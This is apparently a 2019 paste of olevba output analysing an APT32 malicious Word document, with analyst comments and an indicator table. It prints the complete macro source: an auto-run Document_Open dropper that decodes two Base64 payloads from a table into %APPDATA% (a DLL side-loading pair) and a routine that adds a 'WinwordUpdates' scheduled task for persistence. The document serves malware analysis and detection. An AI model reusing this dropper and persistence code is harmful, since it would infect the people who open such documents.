conghiaa

APT32 docs vba

Feb 25th, 2019
  1. olevba 0.53.1 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. MHT:MASIHB-- d1901f0b6266e4be23d805daaed7a10e1d0abcc5e30ed7c38803d13b80caf74d.doc
  5. ===============================================================================
  6. FILE: d1901f0b6266e4be23d805daaed7a10e1d0abcc5e30ed7c38803d13b80caf74d.doc
  7. Type: MHTML
  8. -------------------------------------------------------------------------------
  9. VBA MACRO ThisDocument.cls
  10. in file: None - OLE stream: u'VBA/ThisDocument'
  11. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  12. Private Sub Document_Open()
          ' Analyst note: Word auto-run event handler; it runs when the document is
          ' opened and macros are allowed. It decodes two Base64 blobs stored in the
          ' document's first table, writes them under %APPDATA%, and then calls the
          ' routine further down that registers a scheduled task for the dropped EXE.
          ' Host indicators visible in this Sub: %APPDATA%\WinwordUpdates.exe and
          ' %APPDATA%\wwlib.dll, both created by the Word process itself.
          ' NOTE(review): wwlib.dll is also the name of a library the genuine
          ' winword.exe loads, so this EXE/DLL pair looks like DLL side-loading;
          ' confirm by examining the two dropped files.
          ' No On Error handler is set here, so a decode failure (for example, a
          ' document whose table was stripped) surfaces as a runtime error.
  13.     Dim sAppData As String
  14.     sAppData = Environ("APPDATA")
  15.     sAppData = sAppData & "\WinwordUpdates.exe"
  16.     Dim sAppData1 As String
  17.     sAppData1 = Environ("APPDATA")
  18.     sAppData1 = sAppData1 & "\wwlib.dll"
  19.    
  20.     Dim b As String
  21.     Dim a As String
  22.     Dim tableNew As Table
          ' The payloads travel as text in row 1 of the first table of the document:
          ' cell (1,1) becomes the EXE, cell (1,2) becomes the DLL.
  23.     Set tableNew = ActiveDocument.Tables(1)
  24.     a = tableNew.Cell(1, 1).Range.Text
          ' A cell's Range.Text ends with a two-character end-of-cell marker; it is
          ' dropped so only Base64 text reaches the decoder.
  25.     a = Left(a, Len(a) - 2)
  26.     b = Base64Decode(a)
  27.     Dim fso As Object
  28.     Set fso = CreateObject("Scripting.FileSystemObject")
  29.     Dim oFile As Object
          ' First file write: decoded cell (1,1) -> %APPDATA%\WinwordUpdates.exe.
  30.     Set oFile = fso.CreateTextFile(sAppData)
  31.     oFile.Write b
  32.     oFile.Close
  33.    
  34.     Dim c As String
  35.     Dim d As String
  36.     c = tableNew.Cell(1, 2).Range.Text
  37.     c = Left(c, Len(c) - 2)
  38.     d = Base64Decode(c)
  39.     Dim fso1 As Object
  40.     Set fso1 = CreateObject("Scripting.FileSystemObject")
  41.     Dim oFile1 As Object
          ' Second file write: decoded cell (1,2) -> %APPDATA%\wwlib.dll.
  42.     Set oFile1 = fso1.CreateTextFile(sAppData1)
  43.     oFile1.Write d
  44.     oFile1.Close
  45.    
          ' Persistence step: this call registers the "WinwordUpdates" scheduled task
          ' (see the function of the same name later in this module).
  46.     yiBhyERIualWRmBjcsIbCZLq
  47.     Set fso = Nothing
  48.     Set oFile = Nothing
  49.     Set fso1 = Nothing
  50.     Set oFile1 = Nothing
  51. End Sub
  52.  
  53. Function Base64Decode(ByVal base64String) As String
        ' Analyst note: plain Base64 decoder using the standard alphabet. It takes
        ' the Base64 text, removes CR/LF pairs, tabs and spaces, and returns the
        ' decoded bytes as a String with one character per byte.
        ' Raises error 1 when the cleaned length is not a multiple of 4 and error 2
        ' on a character outside the alphabet. The Exit Function statements that
        ' follow each Err.Raise are never reached.
        ' Document_Open uses this to turn the two table cells into the dropped files.
  54.   Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
  55.   Dim dataLength, sOut, groupBegin
  56.  
  57.   base64String = Replace(base64String, vbCrLf, "")
  58.   base64String = Replace(base64String, vbTab, "")
  59.   base64String = Replace(base64String, " ", "")
  60.  
  61.   dataLength = Len(base64String)
  62.   If dataLength Mod 4 <> 0 Then
  63.     Err.Raise 1, "Base64Decode", "Bad Base64 string."
  64.     Exit Function
  65.   End If
  66.  
        ' Each pass consumes one 4-character group, which encodes up to 3 bytes.
  67.   For groupBegin = 1 To dataLength Step 4
  68.     Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
  69.     numDataBytes = 3
  70.     nGroup = 0
  71.  
  72.     For CharCounter = 0 To 3
  73.  
  74.       thisChar = Mid(base64String, groupBegin + CharCounter, 1)
  75.  
          ' "=" is padding: it contributes zero bits and removes one output byte.
  76.       If thisChar = "=" Then
  77.         numDataBytes = numDataBytes - 1
  78.         thisData = 0
  79.       Else
            ' Alphabet position minus one is the 6-bit value; InStr returns 0 for
            ' an unknown character, which gives the -1 tested below.
  80.         thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
  81.       End If
  82.       If thisData = -1 Then
  83.         Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
  84.         Exit Function
  85.       End If
  86.  
          ' Accumulate four 6-bit values into one 24-bit number.
  87.       nGroup = 64 * nGroup + thisData
  88.     Next
  89.  
        ' The 24-bit value is rendered as six hex digits, zero-padded on the left,
        ' and then split into three bytes.
  90.     nGroup = Hex(nGroup)
  91.  
  92.     nGroup = String(6 - Len(nGroup), "0") & nGroup
  93.  
  94.     pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
  95.       Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
  96.       Chr(CByte("&H" & Mid(nGroup, 5, 2)))
  97.    
        ' Keep only the bytes that are real data (drops the bytes implied by "=").
  98.     sOut = sOut & Left(pOut, numDataBytes)
  99.   Next
  100.  
  101.   Base64Decode = sOut
  102. End Function
  103.  
  104. Function yiBhyERIualWRmBjcsIbCZLq()
           ' Analyst note: persistence routine. Through the Schedule.Service COM
           ' object it registers a task named "WinwordUpdates" in the root task
           ' folder. The task runs %APPDATA%\WinwordUpdates.exe with no arguments,
           ' first 30 seconds after registration and then every 5 minutes.
           ' Detection points: an Office process instantiating Schedule.Service, and
           ' task-creation telemetry (for example Security event 4698 where audited)
           ' for a task named "WinwordUpdates" whose action path is under %APPDATA%.
           ' NOTE(review): the function name looks machine-generated; treat it as
           ' per-sample and prefer the task name and file paths as indicators.
  105.     Dim sAppData As String
  106.     sAppData = Environ("APPDATA")
  107.     sAppData = sAppData & "\WinwordUpdates.exe"
           ' Task Scheduler scripting values: 1 = time trigger, 0 = execute action.
  108.     Const TriggerTypeTime = 1
  109.     Const ActionTypeExec = 0
           ' "service" is used without a Dim statement.
  110.     Set service = CreateObject("Schedule.Service")
  111.     Call service.Connect
  112.     Dim rootFolder
  113.     Set rootFolder = service.GetFolder("\")
  114.     Dim taskDefinition
  115.     Set taskDefinition = service.NewTask(0)
  116.     Dim principal
  117.     Set principal = taskDefinition.principal
           ' LogonType 3 is the interactive-token logon type: the task runs with the
           ' token of the logged-on user.
  118.     principal.LogonType = 3
  119.     Dim settings
  120.     Set settings = taskDefinition.settings
  121.     settings.Enabled = True
  122.     settings.StartWhenAvailable = True
           ' Hidden is False, so the task is not marked hidden in the scheduler UI.
  123.     settings.Hidden = False
  124.     Dim triggers
  125.     Set triggers = taskDefinition.triggers
  126.     Dim trigger
  127.     Set trigger = triggers.Create(TriggerTypeTime)
           ' endTime is declared but never assigned, and no EndBoundary is set on
           ' the trigger anywhere in this function.
  128.     Dim startTime, endTime
  129.     Dim time
           ' First run is scheduled 30 seconds after the macro executes (local time).
  130.     time = DateAdd("s", 30, Now)
  131.     startTime = XmlTime(time)
  132.     trigger.StartBoundary = startTime
  133.     trigger.Enabled = True
  134.     Dim Repetition
  135.     Set Repetition = trigger.Repetition
           ' The concatenation yields "PT5M", a five-minute repetition interval.
  136.     Repetition.Interval = "PT" & "5" & "M"
  137.     Dim Action
  138.     Set Action = taskDefinition.Actions.Create(ActionTypeExec)
  139.     Action.Path = sAppData
  140.     Action.Arguments = ""
           ' Flag 6 is create-or-update, so running the macro again replaces an
           ' existing task of the same name; user and password are omitted and the
           ' final 3 repeats the interactive-token logon type.
  141.     Call rootFolder.RegisterTaskDefinition("WinwordUpdates", taskDefinition, 6, , , 3)
  142. End Function
  143. Function XmlTime(t)
           ' Analyst note: formats the date/time value t as "yyyy-mm-ddThh:mm:ss"
           ' with no time-zone suffix. The scheduled-task routine assigns the result
           ' to the trigger's StartBoundary.
  144.     Dim cSecond, cMinute, CHour, cDay, cMonth, cYear
  145.     Dim tTime, tDate
           ' Zero-padding idiom: prefix "0" here, then keep the rightmost two
           ' characters with Right(..., 2) below.
  146.     cSecond = "0" & Second(t)
  147.     cMinute = "0" & Minute(t)
  148.     CHour = "0" & Hour(t)
  149.     cDay = "0" & Day(t)
  150.     cMonth = "0" & Month(t)
  151.     cYear = Year(t)
  152.     tTime = Right(CHour, 2) & ":" & Right(cMinute, 2) & _
  153.         ":" & Right(cSecond, 2)
  154.     tDate = cYear & "-" & Right(cMonth, 2) & "-" & Right(cDay, 2)
  155.     XmlTime = tDate & "T" & tTime
  156. End Function
  157.  
  158.  
  159.  
  160.  
  161.  
  162.  
  163.  
  164.  
  165.  
  166.  
  167.  
  168.  
  169.  
  170.  
  171.  
  172. +------------+--------------------+-----------------------------------------+
  173. | Type       | Keyword            | Description                             |
  174. +------------+--------------------+-----------------------------------------+
  175. | AutoExec   | Document_Open      | Runs when the Word or Publisher         |
  176. |            |                    | document is opened                      |
  177. | Suspicious | Chr                | May attempt to obfuscate specific       |
  178. |            |                    | strings (use option --deobf to          |
  179. |            |                    | deobfuscate)                            |
  180. | Suspicious | CreateObject       | May create an OLE object                |
  181. | Suspicious | CreateTextFile     | May create a text file                  |
  182. | Suspicious | Environ            | May read system environment variables   |
  183. | Suspicious | Write              | May write to a file (if combined with   |
  184. |            |                    | Open)                                   |
  185. | Suspicious | Hex Strings        | Hex-encoded strings were detected, may  |
  186. |            |                    | be used to obfuscate strings (option    |
  187. |            |                    | --decode to see all)                    |
  188. | Suspicious | Base64 Strings     | Base64-encoded strings were detected,   |
  189. |            |                    | may be used to obfuscate strings        |
  190. |            |                    | (option --decode to see all)            |
  191. | IOC        | WinwordUpdates.exe | Executable file name                    |
  192. | IOC        | wwlib.dll          | Executable file name                    |
  193. +------------+--------------------+-----------------------------------------+